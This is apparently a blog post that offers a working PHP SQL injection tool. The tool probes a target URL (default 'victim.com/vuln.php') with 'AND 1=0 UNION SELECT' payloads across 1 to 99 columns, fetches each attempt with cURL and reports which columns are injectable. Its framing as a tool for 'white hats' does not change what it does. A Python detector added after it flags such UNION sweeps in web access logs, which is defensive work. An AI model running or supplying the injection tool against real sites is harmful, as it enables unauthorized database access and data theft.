PHP Script Finder Table

This is a PHP script used in web security to find tables in a website's database. It is very useful for IT security practitioners working as white hats.

<html>
<head>
<title>..:: SQL Table Finder ::..</title>
<meta http-equiv="expires" content="0">
<style>
body,table{
font-family:courier new;
font-size:11px;
color:#00FF00;
background-color:#000000;
}
</style>
</head>

<body>
<center>
<form action="" method="post">
<b>Specify the website:</b>
<input size="40" type="text" name="site" value="http://victim.com/vuln.php?bug=1" style="color: #0066cc; border: 1px solid #0066cc;background-color: #000000">
<input size="1" type="text" name="separator" value="+" style="color: #0066cc; border: 1px solid #0066cc;background-color: #000000">
<input size="1" type="text" name="comment" value="--" style="color: #0066cc; border: 1px solid #0066cc;background-color: #000000">
<input type="hidden" name="go" value="GO!" style="color: #0066cc; border: 1px solid #0066cc;background-color: #000000">
<input type="submit" value="GO!" style="color: #0066cc; border: 1px solid #0066cc;background-color: #000000">
</form>
<?php
if (isset($_POST['go'])) {
    set_time_limit(0); // disable timeout
    $working_union = false;
    // Repeat the request with 1 to 99 columns in the UNION SELECT list
    for ($i = 1; $i < 100; $i++) {
        $url = $_POST['site'] . $_POST['separator'] . 'AND' . $_POST['separator'] . '1=0' . $_POST['separator'] . 'UNION' . $_POST['separator'] . 'SELECT' . $_POST['separator'];
        for ($j = 1; $j <= $i; $j++) {
            // Each column carries a marker: 6191337 followed by the two-digit column index
            $url .= sprintf('6191337%02d', $j);
            if ($j < $i) {
                $url .= ',';
            }
        }
        $url .= $_POST['comment'];
        //echo 'TESTING URL: ', $url, '<br>';
        $page = view_page($url);
        $page = strip_tags($page);
        // A marker reflected in the response means this column count was accepted
        if (!(strpos($page, '6191337') === false)) {
            $working_union = true;
            echo '<font color="red">FOUND WORKING UNION!</font><br>';
            $url = str_replace('61913370', '', $url);
            $url = str_replace('6191337', '', $url);
            echo '<font color="green">', $url, '</font><br>';
            // Report the column index that follows every reflected marker
            while (true) {
                $page = substr(strstr($page, '6191337'), 7);
                if ($page == false) {
                    break;
                }
                echo 'Injectable parameter: ', (int) substr($page, 0, 2), '<br>';
            }
            break;
        }
    }
    if ($working_union == false) {
        print '<font color="red">NO WORKING UNION FOUND!</font><br>';
    }
}

// Fetch a URL with cURL and return the response body as a string
function view_page($url) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); // return site as string
    $result = curl_exec($curl);
    curl_close($curl);
    return $result;
}
?>
</body>
</html>

Save this script with the .php extension.
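The script above appends `AND 1=0 UNION SELECT` followed by a growing list of `6191337NN` marker values and repeats the request with 1 to 99 columns, which leaves a recognizable sweep in the target's access log. The Python detector below is an added example, not part of the original post; the log lines, IP addresses, paths and the `find_union_sweeps` name are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=1+AND+1=0+UNION+SELECT+619133701-- HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /item.php?id=1+AND+1=0+UNION+SELECT+619133701,619133702-- HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /item.php?id=1+AND+1=0+UNION+SELECT+619133701,619133702,619133703-- HTTP/1.1" 200 640 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
198.51.100.20 - - [10/Oct/2023:13:56:01 +0000] "GET /search.php?q=credit+union+select+committee HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2023:13:57:10 +0000] "GET /item.php?id=1%20AND%201=0%20UNION/**/SELECT/**/619133701,619133702-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

MARKER = "6191337"                 # marker prefix used by the script on this page
GAP = r"(?:\s|/\*.*?\*/)+"         # separator: whitespace or an inline SQL comment
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')
PROBE = re.compile(
    r"union" + GAP + r"select" + GAP
    + r"(" + MARKER + r"\d{2}(?:\s*,\s*" + MARKER + r"\d{2})*)",
    re.IGNORECASE,
)

def find_union_sweeps(log_text, min_steps=3):
    """Map client IP -> sorted column counts probed, for clients that sent
    at least min_steps probes with distinct column counts."""
    counts = defaultdict(set)
    for line in log_text.splitlines():
        req = REQUEST.match(line)
        if not req:
            continue
        ip, target = req.groups()
        # Decode '+' and %XX so every separator variant looks the same
        probe = PROBE.search(unquote_plus(target))
        if probe:
            counts[ip].add(len(probe.group(1).split(",")))
    return {ip: sorted(c) for ip, c in counts.items() if len(c) >= min_steps}

if __name__ == "__main__":
    for ip, cols in find_union_sweeps(SAMPLE_LOG).items():
        print(f"{ip}: UNION column sweep, column counts tried: {cols}")
```

Lowering `min_steps` to 1 also reports single probes, at the cost of more noise.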

Thank you for visiting azizalfian.com
